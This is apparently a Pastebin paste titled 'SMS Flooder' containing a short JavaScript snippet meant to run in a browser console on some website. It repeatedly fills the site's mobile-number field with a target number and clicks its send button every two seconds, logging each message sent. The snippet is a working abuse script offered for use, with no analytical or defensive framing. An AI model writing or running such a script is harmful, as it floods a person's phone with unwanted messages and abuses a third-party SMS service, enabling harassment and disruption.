Advertisement
sonujoshi

SMS Flooder

May 17th, 2013
88
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. var mobile = 'MobileNumberHere', i=0;
  2. function spamtext(mobile) {
  3.     document.getElementById('txtMobileNoNew').value = mobile;
  4.     document.getElementById("btnNewApp").click();
  5. }
  6. setInterval(function(){spamtext(mobile); console.log('message sent: '+(i+1)); i++;},2000);
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement